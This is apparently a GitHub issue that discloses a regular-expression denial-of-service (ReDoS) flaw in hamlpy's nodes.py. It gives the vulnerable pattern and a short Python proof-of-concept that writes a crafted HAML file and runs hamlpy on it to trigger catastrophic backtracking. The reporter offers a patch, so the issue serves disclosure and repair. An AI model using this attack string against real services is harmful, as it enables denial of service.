A ReDoS vulnerability exists in nodes.py #175
Description
The affected code is located in nodes.py-line59. It uses the vulnerable regular expression \\([#=]\{\s*(.+?)\s*\}). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below
import os
f = open("./hamltest.haml",'a')
f.write("#profile\n")
f.write("\t.left.column\n")
f.write("\t\t")
i = 100
f.write('\\#{'+ '\t'*1651*i + '\x00' + '\t'*1651*i + '\n\\}') #attack string
f.write("\n")
f.write("\t.right.column\n")
f.write("\t\t#bio Jesse Miller\n")
f.close()
os.system('hamlpy ./hamltest.haml')I can provide you a patch to repair the ReDoS vulnerability